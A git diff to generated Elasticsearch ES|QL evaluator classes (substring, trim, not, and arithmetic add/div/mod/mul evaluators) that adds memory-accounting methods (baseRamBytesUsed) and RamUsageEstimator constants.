a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringNoLengthEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringNoLengthEvaluator.java index f9d168e21548c..6fa5a9fcd5bf8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringNoLengthEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringNoLengthEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SubstringNoLengthEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubstringNoLengthEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, IntBlock startBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/TrimEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/TrimEvaluator.java index b756fd69302e5..07d45bac1573b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/TrimEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/TrimEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class TrimEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(TrimEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock valBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/logical/NotEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/logical/NotEvaluator.java index 48a18bca990e7..df72c41ddabbf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/logical/NotEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/logical/NotEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NotEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator v; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += v.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock vBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDateNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDateNanosEvaluator.java index a484dd87d0829..dbb2f54cd3e41 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDateNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDateNanosEvaluator.java @@ -10,6 +10,7 @@ import java.lang.String; import java.time.DateTimeException; import java.time.temporal.TemporalAmount; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AddDateNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddDateNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator dateNanos; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += dateNanos.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock dateNanosBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDatetimesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDatetimesEvaluator.java index 2493924276af1..b61531526fa70 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDatetimesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDatetimesEvaluator.java @@ -10,6 +10,7 @@ import java.lang.String; import java.time.DateTimeException; import java.time.temporal.TemporalAmount; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AddDatetimesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddDatetimesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator datetime; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += datetime.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock datetimeBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDoublesEvaluator.java index cd052b38c7791..5f0600f8da2dc 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDoublesEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AddDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddIntsEvaluator.java index 680b70089b105..65d507bee4ce3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddIntsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AddIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddLongsEvaluator.java index b309702ccae6a..3c64881c4e922 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AddLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddUnsignedLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddUnsignedLongsEvaluator.java index 9267d93104541..0d7988969f9c1 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddUnsignedLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddUnsignedLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AddUnsignedLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddUnsignedLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivDoublesEvaluator.java index e8d2d440dc475..eec600defcd3b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivDoublesEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DivDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DivDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivIntsEvaluator.java index c86acaaf8c05b..d76c7576cc5e5 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivIntsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DivIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DivIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivLongsEvaluator.java index 40c0df781f9ad..fde09b222c84f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DivLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DivLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivUnsignedLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivUnsignedLongsEvaluator.java index 84547b719e3cb..85064a626a1ca 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivUnsignedLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivUnsignedLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DivUnsignedLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DivUnsignedLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModDoublesEvaluator.java index 1d48d6ba595b8..733469d38d8e3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModDoublesEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ModDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ModDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModIntsEvaluator.java index ed5fec274e62c..fa6c02326fa82 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModIntsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ModIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ModIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModLongsEvaluator.java index f061968a07167..5609ee3346800 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ModLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ModLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModUnsignedLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModUnsignedLongsEvaluator.java index b22af43813552..f82c4f4286958 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModUnsignedLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModUnsignedLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ModUnsignedLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ModUnsignedLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulDoublesEvaluator.java index 7e11f0828b5af..b0fe71e1bbafe 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulDoublesEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MulDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MulDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public 